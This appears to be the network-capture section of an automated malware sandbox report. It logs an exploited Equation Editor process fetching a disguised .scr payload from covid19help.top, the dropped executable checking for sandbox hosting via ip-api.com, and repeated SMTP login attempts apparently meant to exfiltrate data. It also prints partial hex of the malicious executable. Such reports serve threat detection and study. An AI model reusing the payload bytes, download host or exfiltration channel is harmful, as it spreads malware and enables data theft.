                                                                                      Data Raw: 74 72 75 65 0a
                                                                                      Data Ascii: true


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.2249165208.95.112.180312C:\Users\user\AppData\Roaming\egFUHsL.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Apr 18, 2024 10:24:09.311904907 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                      Host: ip-api.com
                                                                                      Connection: Keep-Alive
                                                                                      Apr 18, 2024 10:24:09.429847002 CEST174INHTTP/1.1 200 OK
                                                                                      Date: Thu, 18 Apr 2024 08:24:09 GMT
                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                      Content-Length: 5
                                                                                      Access-Control-Allow-Origin: *
                                                                                      X-Ttl: 51
                                                                                      X-Rl: 43
                                                                                      Data Raw: 74 72 75 65 0a
                                                                                      Data Ascii: true


                                                                                      HTTPS Proxied Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.2249161104.21.83.1284433308C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-04-18 08:23:54 UTC321OUTGET /JBNvj66BwYU3yCv.scr HTTP/1.1
                                                                                      Accept: */*
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                      Host: covid19help.top
                                                                                      Connection: Keep-Alive
                                                                                      2024-04-18 08:23:55 UTC771INHTTP/1.1 200 OK
                                                                                      Date: Thu, 18 Apr 2024 08:23:55 GMT
                                                                                      Content-Type: application/x-silverlight
                                                                                      Content-Length: 722440
                                                                                      Connection: close
                                                                                      Last-Modified: Wed, 17 Apr 2024 00:51:24 GMT
                                                                                      ETag: "b0608-6164041005c18"
                                                                                      Accept-Ranges: bytes
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t4QMP3CBBT3RZWkOa6h70BZwY6%2FiCa0nsjQeA6VzjPji%2Fp4HniQEpjbTZNJbH5ZKcwHDFSAcPngiY6Sw%2B4q9lp6w1rLcmj%2FOeDxuHKmQu%2BA7imfSeKpY6i1kRlB46qww3fs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                      X-Content-Type-Options: nosniff
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 876341676ec053fc-ATL
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      2024-04-18 08:23:55 UTC598INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 74 1b 1f 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 b6 0a 00 00 18 00 00 00 00 00 00 ee d5 0a 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELtf @ @
                                                                                      2024-04-18 08:23:55 UTC1369INData Raw: 00 00 00 00 00 00 20 86 01 00 00 8d 01 00 00 01 25 d0 5b 00 00 04 28 01 00 00 0a 80 5c 00 00 04 20 7c 02 00 00 8d 01 00 00 01 25 d0 6b 00 00 04 28 01 00 00 0a 80 6c 00 00 04 28 0a 01 00 06 2a d0 01 00 00 06 26 2a 00 00 00 42 02 03 04 20 00 10 00 00 28 03 00 00 06 00 00 2a 00 00 00 13 30 09 00 17 00 00 00 00 00 00 00 02 03 04 1f 2c 1f 22 1f 22 1f 23 17 05 28 07 00 00 06 2b 00 00 00 2a 00 13 30 09 00 1a 00 00 00 00 00 00 00 02 03 04 05 1f 22 1f 22 1f 23 17 20 00 10 00 00 28 07 00 00 06 2b 00 00 00 2a 00 00 13 30 09 00 17 00 00 00 00 00 00 00 02 03 04 05 1f 22 1f 22 1f 23 17 0e 04 28 07 00 00 06 2b 00 00 00 2a 00 13 30 09 00 1b 00 00 00 00 00 00 00 02 03 04 05 0e 04 0e 05 0e 06 0e 07 20 00 10 00 00 28 07 00 00 06 2b 00 00 00 2a 00 13 30 09 00 2b 00 00 00 00
                                                                                      Data Ascii: %[(\ |%k(l(*&*B (*0,""#(+*0""# (+*0""#(+*0 (+*0+
                                                                                      2024-04-18 08:23:55 UTC1369INData Raw: 93 20 94 54 00 00 59 13 0b 38 85 fe ff ff 00 02 7b 01 00 00 04 02 7b 01 00 00 04 6f 0a 00 00 0a 6f 0b 00 00 0a 00 00 11 0c 20 88 01 00 00 93 13 0b 38 5d fe ff ff 08 0b de 2c 2b 00 1a 13 0f 11 0f 45 05 00 00 00 00 00 00 00 03 00 00 00 03 00 00 00 02 00 00 00 00 00 00 00 2b 00 00 02 16 7d 03 00 00 04 00 dc 2b 00 18 13 11 11 11 45 05 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 2b 00 07 2a 00 00 00 41 1c 00 00 02 00 00 00 6c 00 00 00 ad 01 00 00 19 02 00 00 2c 00 00 00 00 00 00 00 2a 00 02 15 6a 7d 02 00 00 04 2a 00 3a 00 02 02 28 68 00 00 06 7d 02 00 00 04 2a 00 13 30 06 00 eb 00 00 00 06 00 00 11 7e 5c 00 00 04 13 05 7e 6c 00 00 04 13 06 18 13 04 11 04 45 09 00 00 00 88 00 00 00 6b 00 00 00 00 00 00 00 4c 00 00 00 07 00 00 00 07 00
                                                                                      Data Ascii: TY8{{oo 8],+E+}+E+*Al,*j}*:(h}*0~\~lEkL
                                                                                      2024-04-18 08:23:55 UTC1369INData Raw: 05 ff ff ff 08 13 06 11 09 20 e9 00 00 00 93 20 80 51 00 00 59 13 08 38 ed fe ff ff 11 06 2a 00 13 30 01 00 05 00 00 00 07 00 00 11 00 17 0a 06 2a 00 00 00 13 30 02 00 0d 00 00 00 07 00 00 11 00 02 7b 08 00 00 04 14 fe 03 0a 06 2a 00 00 00 13 30 01 00 05 00 00 00 07 00 00 11 00 16 0a 06 2a 00 00 00 13 30 01 00 05 00 00 00 07 00 00 11 00 17 0a 06 2a 00 00 00 13 30 01 00 0a 00 00 00 0d 00 00 11 00 02 7b 09 00 00 04 0a 06 2a 00 00 0a 00 2a 00 0a 00 2a 00 13 30 01 00 05 00 00 00 07 00 00 11 00 16 0a 06 2a 00 00 00 42 00 02 14 7d 08 00 00 04 02 16 7d 09 00 00 04 2a 00 00 00 1e 00 73 13 00 00 0a 7a 13 30 01 00 05 00 00 00 07 00 00 11 00 16 0a 06 2a 00 00 00 0a 00 2a 00 13 30 06 00 10 01 00 00 0e 00 00 11 7e 6c 00 00 04 13 07 7e 5c 00 00 04 13 08 19 13 06 11 06
                                                                                      Data Ascii: QY8*0*0{*0*0*0{***0*B}}*sz0**0~l~\
                                                                                      2024-04-18 08:23:55 UTC1369INData Raw: 00 00 11 00 02 7b 0a 00 00 04 0a 06 2a 00 00 13 30 01 00 05 00 00 00 07 00 00 11 00 16 0a 06 2a 00 00 00 13 30 02 00 11 00 00 00 13 00 00 11 00 03 74 05 00 00 1b 02 7b 0a 00 00 04 9a 0a 06 2a 00 00 00 0a 00 2a 00 0a 00 2a 00 13 30 01 00 05 00 00 00 07 00 00 11 00 16 0a 06 2a 00 00 00 13 30 01 00 0e 00 00 00 16 00 00 11 00 d0 02 00 00 02 28 1c 00 00 0a 0a 06 2a 00 00 13 30 01 00 05 00 00 00 07 00 00 11 00 17 0a 06 2a 00 00 00 13 30 01 00 0e 00 00 00 16 00 00 11 00 d0 0c 00 00 01 28 1c 00 00 0a 0a 06 2a 00 00 36 28 0a 01 00 06 2a d0 4c 00 00 06 26 2a 00 00 13 30 08 00 4e 00 00 00 07 00 00 11 02 28 10 00 00 0a 00 00 03 16 fe 04 0a 06 2c 2f 72 01 00 00 70 03 8c 09 00 00 01 28 05 00 00 0a 28 d9 00 00 06 17 8d 0b 00 00 01 25 16 03 8c 09 00 00 01 a2 28 06 00 00
                                                                                      Data Ascii: {*0*0t{***0*0(*0*0(*6(*L&*0N(,/rp((%(
                                                                                      2024-04-18 08:23:55 UTC1369INData Raw: 01 00 0a 00 00 00 15 00 00 11 00 02 7b 14 00 00 04 0a 06 2a 00 00 13 30 01 00 0a 00 00 00 1d 00 00 11 00 02 7b 1b 00 00 04 0a 06 2a 00 00 26 00 02 03 7d 1b 00 00 04 2a 00 00 13 30 01 00 0a 00 00 00 1e 00 00 11 00 02 7b 1c 00 00 04 0a 06 2a 00 00 26 00 02 03 7d 1c 00 00 04 2a 00 00 13 30 01 00 0a 00 00 00 07 00 00 11 00 02 7b 1d 00 00 04 0a 06 2a 00 00 26 00 02 03 7d 1d 00 00 04 2a 00 00 13 30 01 00 0a 00 00 00 07 00 00 11 00 02 7b 1e 00 00 04 0a 06 2a 00 00 26 00 02 03 7d 1e 00 00 04 2a 00 00 1e 02 7b 2f 00 00 04 2a 22 02 03 7d 2f 00 00 04 2a 00 00 00 13 30 01 00 11 00 00 00 15 00 00 11 00 02 28 6f 00 00 06 00 02 7b 26 00 00 04 0a 06 2a 00 00 00 13 30 01 00 0a 00 00 00 07 00 00 11 00 02 7b 29 00 00 04 0a 06 2a 00 00 13 30 04 00 a4 00 00 00 1f 00 00 11 7e
                                                                                      Data Ascii: {*0{*&}*0{*&}*0{*&}*0{*&}*{/*"}/*0(o{&*0{)*0~
                                                                                      2024-04-18 08:23:55 UTC1369INData Raw: 85 00 00 59 13 04 2b 96 1d 2b f9 06 0c 11 06 20 5b 01 00 00 93 20 b0 b3 00 00 59 13 04 38 7c ff ff ff 15 0c 11 06 20 36 02 00 00 93 20 fd 9c 00 00 59 13 04 38 65 ff ff ff 08 2a 00 00 2e 00 02 03 16 28 72 00 00 06 00 2a 13 30 04 00 2f 02 00 00 25 00 00 11 7e 5c 00 00 04 13 09 7e 6c 00 00 04 13 0a 1b 13 08 11 08 45 16 00 00 00 50 00 00 00 f0 00 00 00 2b 00 00 00 3a 01 00 00 6c 00 00 00 00 00 00 00 18 01 00 00 00 01 00 00 79 01 00 00 ca 00 00 00 a2 00 00 00 36 00 00 00 82 00 00 00 50 00 00 00 be 01 00 00 5b 00 00 00 2b 00 00 00 21 01 00 00 56 01 00 00 bf 00 00 00 95 01 00 00 ad 00 00 00 00 03 14 fe 01 0a 06 2c 12 11 09 20 cc 00 00 00 93 20 be 52 00 00 59 13 08 2b 86 11 0a 20 c3 01 00 00 93 20 72 bb 00 00 59 2b ec 72 7f 00 00 70 73 22 00 00 0a 7a 04 16 32 12
                                                                                      Data Ascii: Y++ [ Y8| 6 Y8e*.(r*0/%~\~lEP+:ly6P[+!V, RY+ rY+rps"z2
                                                                                      2024-04-18 08:23:55 UTC1369INData Raw: 45 20 00 00 00 9f 01 00 00 6a 01 00 00 dd 00 00 00 a8 01 00 00 dd 01 00 00 a7 00 00 00 89 01 00 00 2f 01 00 00 fe 01 00 00 94 01 00 00 a7 02 00 00 b6 00 00 00 77 00 00 00 0f 01 00 00 d6 00 00 00 82 00 00 00 2d 02 00 00 4d 00 00 00 b2 02 00 00 b2 01 00 00 55 02 00 00 6f 02 00 00 8c 00 00 00 6a 01 00 00 90 02 00 00 00 00 00 00 48 01 00 00 09 02 00 00 b2 01 00 00 26 00 00 00 3e 01 00 00 f2 00 00 00 00 03 4a 02 7b 28 00 00 04 fe 02 16 fe 01 28 1d 00 00 0a 00 11 0e 1f 44 93 20 8f 86 00 00 59 13 0d 38 53 ff ff ff 03 4a 02 7b 28 00 00 04 fe 01 0b 07 2c 15 11 0f 20 5b 02 00 00 93 20 a2 54 00 00 59 13 0d 38 30 ff ff ff 1f 16 2b f5 00 03 16 54 02 28 78 00 00 06 16 fe 01 0c 08 2c 09 1f 0c 13 0d 38 12 ff ff ff 11 0f 20 e2 01 00 00 93 20 cb a3 00 00 59 2b e9 16 0d 1f
                                                                                      Data Ascii: E j/w-MUojH&>J{((D Y8SJ{(, [ TY80+T(x,8 Y+
                                                                                      2024-04-18 08:23:55 UTC346INData Raw: 84 0e 00 00 6b 0f 00 00 a0 12 00 00 5a 10 00 00 a3 08 00 00 32 0d 00 00 a8 03 00 00 ef 08 00 00 34 0b 00 00 c2 14 00 00 bd 04 00 00 b3 05 00 00 ed 05 00 00 e8 0f 00 00 88 09 00 00 d0 0c 00 00 c7 09 00 00 b3 0b 00 00 42 15 00 00 b4 08 00 00 0a 07 00 00 50 11 00 00 cb 07 00 00 cb 03 00 00 9a 06 00 00 80 14 00 00 77 00 00 00 45 04 00 00 fd 10 00 00 4c 0f 00 00 f5 0e 00 00 45 03 00 00 7b 10 00 00 a9 04 00 00 f5 02 00 00 c1 12 00 00 b0 0d 00 00 62 04 00 00 45 14 00 00 70 0b 00 00 87 0d 00 00 53 02 00 00 a4 07 00 00 ff 0a 00 00 05 12 00 00 94 0b 00 00 38 05 00 00 a6 14 00 00 00 00 00 00 d6 04 00 00 3a 01 00 00 e0 0d 00 00 e0 06 00 00 fb 13 00 00 f9 05 00 00 d0 05 00 00 59 08 00 00 66 06 00 00 49 0a 00 00 1e 0f 00 00 f3 10 00 00 84 11 00 00 30 0e 00 00 29 11 00
                                                                                      Data Ascii: kZ24BPwELE{bEpS8:YfI0)
                                                                                      2024-04-18 08:23:55 UTC1348INData Raw: 00 00 d8 13 00 00 96 0a 00 00 01 13 00 00 d3 0a 00 00 4a 09 00 00 17 03 00 00 1e 0b 00 00 c0 02 00 00 83 01 00 00 06 10 00 00 ea 01 00 00 22 0d 00 00 e3 0c 00 00 8d 0c 00 00 3b 08 00 00 26 0a 00 00 f9 0f 00 00 0e 15 00 00 24 14 00 00 cb 08 00 00 02 07 00 00 18 04 00 00 cf 00 00 00 8a 0a 00 00 a1 04 00 00 5f 05 00 00 db 14 00 00 4f 0b 00 00 0c 0f 00 00 ca 0c 00 00 0c 01 00 00 a4 02 00 00 37 09 00 00 1c 06 00 00 ff 08 00 00 23 05 00 00 6c 01 00 00 b1 10 00 00 88 03 00 00 06 05 00 00 c4 00 00 00 49 07 00 00 b5 13 00 00 bd 0a 00 00 5e 0a 00 00 0f 14 00 00 e5 0e 00 00 10 0e 00 00 d9 05 00 00 5e 0d 00 00 b5 0c 00 00 e9 01 00 00 9d 0b 00 00 a0 11 00 00 93 0f 00 00 76 04 00 00 5f 12 00 00 85 08 00 00 94 0b 00 00 4f 00 00 00 67 11 00 00 39 13 00 00 7c 07 00 00 f8
                                                                                      Data Ascii: J";&$_O7#lI^^v_Og9|


                                                                                      SMTP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IPCommands
                                                                                      Apr 18, 2024 10:24:03.945012093 CEST58749163208.91.198.143192.168.2.22220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                      Apr 18, 2024 10:24:03.946947098 CEST49163587192.168.2.22208.91.198.143EHLO 216041
                                                                                      Apr 18, 2024 10:24:04.105165005 CEST58749163208.91.198.143192.168.2.22250-us2.outbound.mailhostbox.com
                                                                                      250-PIPELINING
                                                                                      250-SIZE 41648128
                                                                                      250-VRFY
                                                                                      250-ETRN
                                                                                      250-STARTTLS
                                                                                      250-AUTH PLAIN LOGIN
                                                                                      250-AUTH=PLAIN LOGIN
                                                                                      250-ENHANCEDSTATUSCODES
                                                                                      250-8BITMIME
                                                                                      250-DSN
                                                                                      250 CHUNKING
                                                                                      Apr 18, 2024 10:24:04.151215076 CEST49163587192.168.2.22208.91.198.143AUTH login b3JpZ2luQGZzaHB4bS5jb20=
                                                                                      Apr 18, 2024 10:24:04.307580948 CEST58749163208.91.198.143192.168.2.22334 UGFzc3dvcmQ6
                                                                                      Apr 18, 2024 10:24:06.291618109 CEST58749163208.91.198.143192.168.2.22535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                                      Apr 18, 2024 10:24:06.466197968 CEST49163587192.168.2.22208.91.198.143MAIL FROM:<origin@fshpxm.com>
                                                                                      Apr 18, 2024 10:24:06.621016026 CEST58749163208.91.198.143192.168.2.22250 2.1.0 Ok
                                                                                      Apr 18, 2024 10:24:06.765515089 CEST49163587192.168.2.22208.91.198.143RCPT TO:<origin@fshpxm.com>
                                                                                      Apr 18, 2024 10:24:06.936445951 CEST58749163208.91.198.143192.168.2.22554 5.7.1 <origin@fshpxm.com>: Relay access denied
                                                                                      Apr 18, 2024 10:24:08.016525984 CEST58749164208.91.198.143192.168.2.22220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                      Apr 18, 2024 10:24:08.016670942 CEST49164587192.168.2.22208.91.198.143EHLO 216041
                                                                                      Apr 18, 2024 10:24:08.018294096 CEST49163587192.168.2.22208.91.198.143QUIT
                                                                                      Apr 18, 2024 10:24:08.170074940 CEST58749164208.91.198.143192.168.2.22250-us2.outbound.mailhostbox.com
                                                                                      250-PIPELINING
                                                                                      250-SIZE 41648128
                                                                                      250-VRFY
                                                                                      250-ETRN
                                                                                      250-STARTTLS
                                                                                      250-AUTH PLAIN LOGIN
                                                                                      250-AUTH=PLAIN LOGIN
                                                                                      250-ENHANCEDSTATUSCODES
                                                                                      250-8BITMIME
                                                                                      250-DSN
                                                                                      250 CHUNKING
                                                                                      Apr 18, 2024 10:24:08.172278881 CEST58749163208.91.198.143192.168.2.22221 2.0.0 Bye
                                                                                      Apr 18, 2024 10:24:08.220700026 CEST49164587192.168.2.22208.91.198.143AUTH login b3JpZ2luQGZzaHB4bS5jb20=
                                                                                      Apr 18, 2024 10:24:08.379296064 CEST58749164208.91.198.143192.168.2.22334 UGFzc3dvcmQ6
                                                                                      Apr 18, 2024 10:24:10.539531946 CEST58749164208.91.198.143192.168.2.22535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                                      Apr 18, 2024 10:24:10.539719105 CEST49164587192.168.2.22208.91.198.143MAIL FROM:<origin@fshpxm.com>
                                                                                      Apr 18, 2024 10:24:10.694917917 CEST58749164208.91.198.143192.168.2.22250 2.1.0 Ok
                                                                                      Apr 18, 2024 10:24:10.695209980 CEST49164587192.168.2.22208.91.198.143RCPT TO:<origin@fshpxm.com>
                                                                                      Apr 18, 2024 10:24:10.867539883 CEST58749164208.91.198.143192.168.2.22554 5.7.1 <origin@fshpxm.com>: Relay access denied
                                                                                      Apr 18, 2024 10:24:12.260631084 CEST58749166208.91.198.143192.168.2.22220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                      Apr 18, 2024 10:24:12.265949011 CEST49166587192.168.2.22208.91.198.143EHLO 216041
                                                                                      Apr 18, 2024 10:24:12.419408083 CEST58749166208.91.198.143192.168.2.22250-us2.outbound.mailhostbox.com
                                                                                      250-PIPELINING
                                                                                      250-SIZE 41648128
                                                                                      250-VRFY
                                                                                      250-ETRN
                                                                                      250-STARTTLS
                                                                                      250-AUTH PLAIN LOGIN
                                                                                      250-AUTH=PLAIN LOGIN
                                                                                      250-ENHANCEDSTATUSCODES
                                                                                      250-8BITMIME
                                                                                      250-DSN
                                                                                      250 CHUNKING
                                                                                      Apr 18, 2024 10:24:12.419683933 CEST49166587192.168.2.22208.91.198.143AUTH login b3JpZ2luQGZzaHB4bS5jb20=
                                                                                      Apr 18, 2024 10:24:13.242820978 CEST58749167208.91.198.143192.168.2.22220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                      Apr 18, 2024 10:24:13.248317003 CEST49167587192.168.2.22208.91.198.143EHLO 216041
                                                                                      Apr 18, 2024 10:24:13.401979923 CEST58749167208.91.198.143192.168.2.22250-us2.outbound.mailhostbox.com
                                                                                      250-PIPELINING
                                                                                      250-SIZE 41648128
                                                                                      250-VRFY
                                                                                      250-ETRN
                                                                                      250-STARTTLS
                                                                                      250-AUTH PLAIN LOGIN
                                                                                      250-AUTH=PLAIN LOGIN
                                                                                      250-ENHANCEDSTATUSCODES
                                                                                      250-8BITMIME
                                                                                      250-DSN
                                                                                      250 CHUNKING
                                                                                      Apr 18, 2024 10:24:13.402292013 CEST49167587192.168.2.22208.91.198.143AUTH login b3JpZ2luQGZzaHB4bS5jb20=
                                                                                      Apr 18, 2024 10:24:13.851263046 CEST58749168208.91.198.143192.168.2.22220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                      Apr 18, 2024 10:24:13.900983095 CEST49168587192.168.2.22208.91.198.143EHLO 216041
                                                                                      Apr 18, 2024 10:24:14.054475069 CEST58749168208.91.198.143192.168.2.22250-us2.outbound.mailhostbox.com
                                                                                      250-PIPELINING
                                                                                      250-SIZE 41648128
                                                                                      250-VRFY
                                                                                      250-ETRN
                                                                                      250-STARTTLS
                                                                                      250-AUTH PLAIN LOGIN
                                                                                      250-AUTH=PLAIN LOGIN
                                                                                      250-ENHANCEDSTATUSCODES
                                                                                      250-8BITMIME
                                                                                      250-DSN
                                                                                      250 CHUNKING
                                                                                      Apr 18, 2024 10:24:14.054744005 CEST49168587192.168.2.22208.91.198.143AUTH login b3JpZ2luQGZzaHB4bS5jb20=
                                                                                      Apr 18, 2024 10:24:16.574812889 CEST58749166208.91.198.143192.168.2.22334 UGFzc3dvcmQ6
                                                                                      Apr 18, 2024 10:24:17.558197021 CEST58749167208.91.198.143192.168.2.22334 UGFzc3dvcmQ6
                                                                                      Apr 18, 2024 10:24:18.210827112 CEST58749168208.91.198.143192.168.2.22334 UGFzc3dvcmQ6
                                                                                      Apr 18, 2024 10:24:18.540417910 CEST58749166208.91.198.143192.168.2.22535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                                      Apr 18, 2024 10:24:18.540730000 CEST49166587192.168.2.22208.91.198.143MAIL FROM:<origin@fshpxm.com>
                                                                                      Apr 18, 2024 10:24:18.695595026 CEST58749166208.91.198.143192.168.2.22250 2.1.0 Ok
                                                                                      Apr 18, 2024 10:24:18.695785046 CEST49166587192.168.2.22208.91.198.143RCPT TO:<origin@fshpxm.com>
                                                                                      Apr 18, 2024 10:24:18.867135048 CEST58749166208.91.198.143192.168.2.22554 5.7.1 <origin@fshpxm.com>: Relay access denied
                                                                                      Apr 18, 2024 10:24:19.540182114 CEST58749167208.91.198.143192.168.2.22535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                                      Apr 18, 2024 10:24:19.540455103 CEST49167587192.168.2.22208.91.198.143MAIL FROM:<origin@fshpxm.com>
                                                                                      Apr 18, 2024 10:24:19.695561886 CEST58749167208.91.198.143192.168.2.22250 2.1.0 Ok
                                                                                      Apr 18, 2024 10:24:19.695841074 CEST49167587192.168.2.22208.91.198.143RCPT TO:<origin@fshpxm.com>
                                                                                      Apr 18, 2024 10:24:19.867471933 CEST58749167208.91.198.143192.168.2.22554 5.7.1 <origin@fshpxm.com>: Relay access denied
                                                                                      Apr 18, 2024 10:24:20.541394949 CEST58749168208.91.198.143192.168.2.22535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                                      Apr 18, 2024 10:24:20.541563034 CEST49168587192.168.2.22208.91.198.143MAIL FROM:<origin@fshpxm.com>
                                                                                      Apr 18, 2024 10:24:20.697396040 CEST58749168208.91.198.143192.168.2.22250 2.1.0 Ok
                                                                                      Apr 18, 2024 10:24:20.697542906 CEST49168587192.168.2.22208.91.198.143RCPT TO:<origin@fshpxm.com>
                                                                                      Apr 18, 2024 10:24:20.867923021 CEST58749168208.91.198.143192.168.2.22554 5.7.1 <origin@fshpxm.com>: Relay access denied
                                                                                      Apr 18, 2024 10:24:33.024961948 CEST49166587192.168.2.22208.91.198.143QUIT
                                                                                      Apr 18, 2024 10:24:33.025233030 CEST49164587192.168.2.22208.91.198.143QUIT
                                                                                      Apr 18, 2024 10:24:33.179514885 CEST58749166208.91.198.143192.168.2.22221 2.0.0 Bye
                                                                                      Apr 18, 2024 10:24:33.179619074 CEST58749164208.91.198.143192.168.2.22221 2.0.0 Bye
                                                                                      Apr 18, 2024 10:24:33.494692087 CEST58749169208.91.198.143192.168.2.22220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                      Apr 18, 2024 10:24:33.494951963 CEST49169587192.168.2.22208.91.198.143EHLO 216041
                                                                                      Apr 18, 2024 10:24:33.648837090 CEST58749169208.91.198.143192.168.2.22250-us2.outbound.mailhostbox.com
                                                                                      250-PIPELINING
                                                                                      250-SIZE 41648128
                                                                                      250-VRFY
                                                                                      250-ETRN
                                                                                      250-STARTTLS
                                                                                      250-AUTH PLAIN LOGIN
                                                                                      250-AUTH=PLAIN LOGIN
                                                                                      250-ENHANCEDSTATUSCODES
                                                                                      250-8BITMIME
                                                                                      250-DSN
                                                                                      250 CHUNKING
                                                                                      Apr 18, 2024 10:24:33.650490046 CEST49169587192.168.2.22208.91.198.143AUTH login b3JpZ2luQGZzaHB4bS5jb20=
                                                                                      Apr 18, 2024 10:24:33.807120085 CEST58749169208.91.198.143192.168.2.22334 UGFzc3dvcmQ6
                                                                                      Apr 18, 2024 10:24:34.346157074 CEST58749170208.91.198.143192.168.2.22220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                      Apr 18, 2024 10:24:34.386981964 CEST49170587192.168.2.22208.91.198.143EHLO 216041
                                                                                      Apr 18, 2024 10:24:34.541156054 CEST58749170208.91.198.143192.168.2.22250-us2.outbound.mailhostbox.com
                                                                                      250-PIPELINING
                                                                                      250-SIZE 41648128
                                                                                      250-VRFY
                                                                                      250-ETRN
                                                                                      250-STARTTLS
                                                                                      250-AUTH PLAIN LOGIN
                                                                                      250-AUTH=PLAIN LOGIN
                                                                                      250-ENHANCEDSTATUSCODES
                                                                                      250-8BITMIME
                                                                                      250-DSN
                                                                                      250 CHUNKING
                                                                                      Apr 18, 2024 10:24:34.541373968 CEST49170587192.168.2.22208.91.198.143AUTH login b3JpZ2luQGZzaHB4bS5jb20=
                                                                                      Apr 18, 2024 10:24:34.698683977 CEST58749170208.91.198.143192.168.2.22334 UGFzc3dvcmQ6
                                                                                      Apr 18, 2024 10:24:35.540153027 CEST58749169208.91.198.143192.168.2.22535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                                      Apr 18, 2024 10:24:35.540386915 CEST49169587192.168.2.22208.91.198.143MAIL FROM:<origin@fshpxm.com>
                                                                                      Apr 18, 2024 10:24:35.694722891 CEST58749169208.91.198.143192.168.2.22250 2.1.0 Ok
                                                                                      Apr 18, 2024 10:24:35.694866896 CEST49169587192.168.2.22208.91.198.143RCPT TO:<origin@fshpxm.com>
                                                                                      Apr 18, 2024 10:24:35.864095926 CEST58749169208.91.198.143192.168.2.22554 5.7.1 <origin@fshpxm.com>: Relay access denied
                                                                                      Apr 18, 2024 10:24:36.029588938 CEST49168587192.168.2.22208.91.198.143QUIT
                                                                                      Apr 18, 2024 10:24:36.029638052 CEST49167587192.168.2.22208.91.198.143QUIT
                                                                                      Apr 18, 2024 10:24:36.183907986 CEST58749168208.91.198.143192.168.2.22221 2.0.0 Bye
                                                                                      Apr 18, 2024 10:24:36.184027910 CEST58749167208.91.198.143192.168.2.22221 2.0.0 Bye
                                                                                      Apr 18, 2024 10:24:36.396716118 CEST58749170208.91.198.143192.168.2.22535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                                      Apr 18, 2024 10:24:36.410909891 CEST49170587192.168.2.22208.91.198.143MAIL FROM:<origin@fshpxm.com>
                                                                                      Apr 18, 2024 10:24:36.496736050 CEST58749171208.91.198.143192.168.2.22220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                      Apr 18, 2024 10:24:36.496970892 CEST49171587192.168.2.22208.91.198.143EHLO 216041
                                                                                      Apr 18, 2024 10:24:36.565984011 CEST58749170208.91.198.143192.168.2.22250 2.1.0 Ok
                                                                                      Apr 18, 2024 10:24:36.566198111 CEST49170587192.168.2.22208.91.198.143RCPT TO:<origin@fshpxm.com>
                                                                                      Apr 18, 2024 10:24:36.650829077 CEST58749171208.91.198.143192.168.2.22250-us2.outbound.mailhostbox.com
                                                                                      250-PIPELINING
                                                                                      250-SIZE 41648128
                                                                                      250-VRFY
                                                                                      250-ETRN
                                                                                      250-STARTTLS
                                                                                      250-AUTH PLAIN LOGIN
                                                                                      250-AUTH=PLAIN LOGIN
                                                                                      250-ENHANCEDSTATUSCODES
                                                                                      250-8BITMIME
                                                                                      250-DSN
                                                                                      250 CHUNKING
                                                                                      Apr 18, 2024 10:24:36.651021957 CEST49171587192.168.2.22208.91.198.143AUTH login b3JpZ2luQGZzaHB4bS5jb20=
                                                                                      Apr 18, 2024 10:24:36.737890005 CEST58749170208.91.198.143192.168.2.22554 5.7.1 <origin@fshpxm.com>: Relay access denied
                                                                                      Apr 18, 2024 10:24:36.807874918 CEST58749171208.91.198.143192.168.2.22334 UGFzc3dvcmQ6
